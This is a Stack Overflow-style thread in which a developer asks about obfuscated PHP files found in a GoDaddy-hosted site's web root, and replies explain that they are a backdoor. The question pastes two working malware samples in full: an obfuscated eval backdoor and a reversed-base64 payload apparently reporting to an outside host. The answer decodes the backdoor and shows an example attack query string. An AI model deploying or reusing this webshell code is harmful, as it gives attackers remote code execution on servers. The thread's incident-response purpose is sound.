# Strange PHP Files In web root

Tags: php, apache, malware

I found several strange files in the `public_html` directory of a sight I'm working on.  I call them strange because:

1. They are named things like `wolakfie.php`,`txvepdhxy.php`, etc.
2. They contain seemingly useless code - not obviously malicious, but certainly suspicious.
3. I didn't put them there.

Now, I'm not the first developer to work on this site, so they could in theory, have done something in the past.  Here is an example of the contents of one of the files:

```
    <?php
    $immanuel='JP';$armory='[L[r=t_ii';$forehead='e';$avowal ='G$I(P'; $hewett ='r';$blockading='c'; $folly= ' '; $balking='c';$caste= '$'; $aspirate ='?ca=R';$hegemony =')t,)aRo]';
    $closing = 'e'; $knell ='epI$';

    $delays ='R';$authors ='t';
    $immortal ='r'; $displace='S'; $decomposition = 's'; $bastard = 'S';$aurelia='G'; $bisexual= 'H'; $canteen='R';$cager = 'O'; $lorain= 'r]Ogp$';$branden = 'r'; $durant ='(';$lacquered='?gD)(<ls$';$dreamt = '[tPv';$earls ='N;o")(_('; $flowing = 'o';$lactate =';'; $cabaret = 'ri"g)sEyr';
    $censor = '@';
    $asparagus= 'T""';
    $graying= 'leopua';
    $casper = 'e';$kiah='sraKTO';$become = 'CiiS';$flak= ':';
    $madmax='_n(H';$economizing= 'Egf$v'; $clatter = 'O';

    $indolently = '(';$interconnection= 'd';

    $indefinite= 'n'; $georgina='veno';
    $deviate ='v'; $appropriating='i'; $cocksure= 'oO,)AmHsa';$efface= '(sisL_]e';$influences='U'; $inched='F';$juxtaposes= 'a'; $jenna='Oc6reetO';

    $colly= 'S';$corundum = '=i"PEosLE';

    $icebergs ='f';$birchen= 'pP'; $brainwashes= 'QH))__';
    $decoded ='tB$eTgod';$brooding= 'V';$equipoise = ':;_(eely';

    $indignation='[';$brooks ='dQCohi_b'; $directing= '"';$inspirer= 'h';$gypping ='aOra)E';
    $courier= '$'; $korey = 'e';$dropping= 'G'; $difficulties = ')';

    $creature='K';
    $blindfold = 'sa_T';

    $dune ='r'; $badger= 'Hl(u'; $imagen = 'E'; $grasp = 'T';$apace='a';
    $hunter= '$)4]';

    $derision =';';$excoriate = 't';$auditor= '?';

    $gecko='_(a';$checkbook = 'MSee$>s'; $foursome ='O_""'; $eben= $jenna['1'] .

    $dune.$checkbook[3]. $gecko['2'] . $excoriate.
    $checkbook[3] . $foursome['1'] . $icebergs. $badger['3'] .
    $georgina['2']. $jenna['1'] .$excoriate. $brooks['5'].$brooks['3'] . $georgina['2'] ;$delano =$folly ;$blanching= $eben ($delano,$checkbook[3]. $deviate . $gecko['2'].$badger['1'] .

    $gecko['1'] .$gecko['2'].$dune.$dune. $gecko['2'] .$equipoise['7'].$foursome['1'] . $birchen['0'] . $brooks['3'] .
    $birchen['0']. $gecko['1'].

    $icebergs.$badger['3'] .

    $georgina['2'] .

    $jenna['1'] .$foursome['1']. $decoded['5'] . $checkbook[3] .

    $auditor ,

    $excoriate.$foursome['1'].
    $gecko['2'] .$dune.$decoded['5']. $checkbook[6] .

    $gecko['1'] .$hunter['1'].

    $hunter['1'] . $hunter['1'] .
    $derision ); $blanching ($auditor,$cocksure['2'] , $evered['5'] ,

    $fineness,
    $baths['5'] ,$checkbook['4'], $cocksure['4'] ,
    $brooks['7'] ,
    $checkbook['4'].
    $brooks['5'].$corundum['0'] .

    $gecko['2'] .$dune. $dune .$gecko['2'] .$equipoise['7'] . $foursome['1'] .$cocksure['5'].$checkbook[3]. $dune. $decoded['5'] .

    $checkbook[3].$gecko['1'].

    $checkbook['4'] . $foursome['1']. $canteen .$imagen.
    $brooks[1].$influences.

    $imagen. $checkbook['1']. $grasp . $cocksure['2'].$checkbook['4'] . $foursome['1'] .$brooks['2'] . $foursome[0] .$foursome[0] .$creature. $knell['2'].$imagen . $cocksure['2'].$checkbook['4'].$foursome['1'] . $checkbook['1'] . $imagen .

    $canteen. $brooding.$imagen. $canteen . $hunter['1'] . $derision.

    $checkbook['4'].$gecko['2']. $corundum['0']. $brooks['5'].
    $checkbook[6] . $checkbook[6] . $checkbook[3].$excoriate .$gecko['1']. $checkbook['4'] .$brooks['5']. $indignation.
    $foursome['3']. $checkbook[6].$brooks['3'] . $brooks['3'] .$brooks['3'] .$badger['1'].$birchen['0']. $inspirer .$decoded['5'] .$foursome['3']. $hunter['3'].$hunter['1'] . $auditor . $checkbook['4'] . $brooks['5'] .
    $indignation. $foursome['3']. $checkbook[6] .$brooks['3'].$brooks['3'].$brooks['3'] .$badger['1'].$birchen['0'] .

    $inspirer . $decoded['5'].$foursome['3'] . $hunter['3'] .

    $equipoise['0'] .
    $gecko['1'].$brooks['5'].$checkbook[6] . $checkbook[6].$checkbook[3] . $excoriate. $gecko['1'] . $checkbook['4']. $brooks['5']. $indignation.
    $foursome['3'] . $badger[0].

    $grasp.$grasp .
    $birchen['1'] .
    $foursome['1'] . $checkbook['1'] . $foursome[0] .$foursome[0]. $foursome[0]. $corundum['7'] .$birchen['1'].

    $badger[0].$dropping .$foursome['3']. $hunter['3']. $hunter['1']. $auditor .$checkbook['4'].
    $brooks['5'].

    $indignation.$foursome['3'] .

    $badger[0] .$grasp .$grasp .
    $birchen['1'] .$foursome['1'] .$checkbook['1'].$foursome[0] .$foursome[0] .$foursome[0].$corundum['7'] . $birchen['1'] .$badger[0] .

    $dropping .$foursome['3'] . $hunter['3']. $equipoise['0']. $brooks['0'].$brooks['5']. $checkbook[3].$hunter['1'] .

    $derision .$checkbook[3].
    $deviate.$gecko['2'].$badger['1'] . $gecko['1'] .$checkbook[6]. $excoriate . $dune.$dune.$checkbook[3]. $deviate. $gecko['1'] .

    $brooks['7'].

    $gecko['2']. $checkbook[6] .$checkbook[3].$jenna['2'] . $hunter['2'].$foursome['1'] .

    $brooks['0'] .
    $checkbook[3].$jenna['1'] .$brooks['3'] .$brooks['0'].

    $checkbook[3].$gecko['1'] .$checkbook[6]. $excoriate. $dune .$dune.
    $checkbook[3] . $deviate.

    $gecko['1'] .$checkbook['4']. $gecko['2'] . $hunter['1'].

    $hunter['1'].

    $hunter['1'] .
    $hunter['1'] .$derision );
```

No obvious `base64_encode` or `eval`, but the strangeness and apparent irrelevance of the code has me raise my eyebrows a little.  I will probably just delete them, but I wondered first if anyone could offer any insight.  The site is on a shared Linux server hosted by *GoDaddy*.

**UPDATE:**  I found another one that looks like it has some `eval`:

`<?php $oypsfe=chr(99).chr(114)."e"."\x61"."\x74"."\x65"."\x5f".chr(102).chr(117)."\x6e"."c"."\x74"."i"."\x6f"."n";$rfktbj = $oypsfe('$a',strrev(';)a$(lave')); $rfktbj(strrev(';))"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"(edoced_46esab(lave'));?>`

The upshot of my question is:

- **What does this code do or how can I find out what this code does?**
- AND **If I've been hacked, where should I look for how to deal with the problem?**

Comment: There's plenty of eval in there, it's just obfuscated. You've been hacked.

Comment: @ceejayoz Okay.  Thanks.  Any guidance you can give me on what to do about this.  Or where to look so I can make sure it is clean.

Comment: Read http://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server and get off shared hosting.

Comment: This is the code that gets evaled: http://ideone.com/sUCJee

Comment: By reading the code, the data got send to `f.gghijacktest.com`. You should also take a look at the temp directory of your O.S. it seems files where created there.

Comment: Relevant bits from the first code: `$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["sooolphg"])?$i["sooolphg"]:(isset($i["HTTP_SOOOLPHG"])?$i["HTTP_SOOOLPHG"]:die);eval(strrev(base64_decode(strrev($a))));` It can pass pretty much anything via request parameters or URL query strings.

Comment: @Shomz - unfortunately my browser crashes when I go to that link - new Chrome browser, windows 10.  But I found something similar to what you posted by going to unphp.net (good site for this stuff).  Are you saying that it can make a get request to that file, and do whatever it wants to do with the request?

Comment: Can you find any payload that was being sent?

Comment: Yeah, that code bit I posted evals any payload they send, and there are quite a few ways to send it. Could be a simple GET query string. You might find that in the logs, but yes, completely open doors.

Comment: @Shomz.  Can I assume it would be in one of those files I found?  Unfortunately; as this is a client site; I'm stuck with what I have.  I don't even have ssh; so I can't look in the `tmp` directory as sugguested by @xorifelse

Comment: @Shomz The good thing I just realized is that GoDaddy will let me use SSH, but they have to move me to a new server to do so.  If I delete all infected files, and have Godaddy move me to a new server; will I be safe?

Comment: Yeah, that first code snippet you posted produces that block of code which I wrote in the comment. Allows anyone to call that file and send a payload in a set of parameters. Yup, you'll be safe once you remove **all** the infected files. Make sure that the infection didn't get inside your own files.

Comment: Your first mistake, using Godaddy for hosting.

Comment: `filename.php?sooolphg=1&HTTP_SOOLPHG=shellAccessEasilyHere` is the format of a query string attack that could be done.

Comment: @Shomz.  The good thing is that I pulled the site from git and remade it, and this happened before I reuploaded it and after I put it in git; so my files are safe.  Just to be sure, I think I'll delete everything - move to a new server - and reupload.  Thanks for your help.

Comment: Awesome! If you're curious, you can do a diff and see all the content that's added, and it also might provide you an insight into where the infection has started. You're welcome, I think I'm rediscovering a new career path. :)

Comment: @Shomz.  Lol..  Thanks

Comment: You're welcome. :) I'll sum up my comments into an answer, so that we don't leave this one open.

Comment: @AzizSaleh - given your profile page says, "So ready to help"; you might consider leaving comments that are helpful.  I didn't choose the hosting;  but even if I did your comment would not be helpful.

Comment: Hey @user1167442 I've been seeing roughly the same thing this year on Godaddy - was wondering did this ever happened again (if you stayed with Godaddy)? Did you investigate the issue further?

Comment: @Nick - it was a site I built for someone else - haven't looked at it in awhile, but it was unable to do anything.  It was looking for a Drupal installation - which an older version of this site had in its webroot.  I haven't checked recently, but when I went to the URL the script was trying to send data to, nothing was there (not surprising).  I suspect it is a Drupal vulnerability

Answer (score 5, accepted):

> They contain seemingly useless code - not obviously malicious, but certainly suspicious.

### They are extremely malicious.

---

Relevant bits from the first code:

```
$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["sooolphg"])?$i["sooolp‌​hg"]:(isset($i["HTTP_SOOOLPHG"])?
  $i["HTTP_SOOOLPHG"] : die);
eval(strrev(base64_deco‌​de(strrev($a))));
```

It can pass in pretty much any payload via request parameters or URL query strings. So anyone making a request like `filename.php?sooolphg=1&HTTP_SOOLPHG=shellAccessEasilyHere` can gain access by having the payload `eval`ed. The parameter `shellAccessEasilyHere` is a command string - reversed, then base64-ed, then finally reversed again. Something like `==QZjh2bgICSlxGbvByVvJHbkJyO` would echo "Hello World".

You can see the code from the other script here (I'm not posting it here for obvious reasons): ideone.com/sUCJee

---

You'll be safe once you remove all the infected files. Make sure that the infection didn't get inside your own files.

Good thing that you pulled the uninfected (make sure it really is so) version from git.

Comment: As I said in the comments.  Thanks.  This could've cost me a lot of work; but it looks like it won't be much at all.

Comment: You're welcome. Yup, that's why regular backups are important.